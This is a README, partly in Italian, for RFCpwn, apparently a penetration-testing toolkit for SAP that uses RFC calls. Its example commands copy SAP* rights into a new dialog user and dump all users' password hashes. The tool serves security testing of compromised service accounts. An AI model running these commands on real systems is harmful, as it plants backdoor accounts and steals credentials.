
Un toolkit di enumerazione e sfruttamento che utilizza chiamate RFC verso SAP
Un toolkit di enumerazione e sfruttamento SAP che utilizza chiamate RFC
Twitter: @icryo
Questo è un toolkit per dimostrare l'impatto di account di servizio compromessi.
Questa PoC non è destinata all'uso in ambienti di produzione, nessuna garanzia di stabilità o supporto.
RFCpwn si basa su pyrfc e sulle librerie fornite da SAP in: https://github.com/SAP/PyRFC#installation
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
[-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
[-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]
An Impacket style enumeration and exploitation tool using SAP RFC calls
optional arguments:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
Authentication:
-ip IP <targetName or address>
-u Username RFC Users Username
-p Password RFC Users Password
-c Client Client- eg.000
-s Sysid System Number- eg 00
-ping RFC Ping Command
User Abuse:
-enum Use to enumerate a specific user
-usercopy add a Dialog User
-user USER Required for -usercopy and -userenum to specify the user
-copy COPY User to be copied required for -usercopy
-pw PW password of new user for -usercopy
Hash Collection:
-dump Dump hashes use with below
-exp EXPERIMENTAL - Dump BCODE / PASSCODE hashes
Ping - conferma connettività
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping
Copia i diritti di un utente in un nuovo utente dialog. Se -copy non è specificato, viene usato SAP*.
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1
Estrae gli hash da tutti gli utenti. Opzione -exp per gli hash sperimentali bcode e passcode.
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump
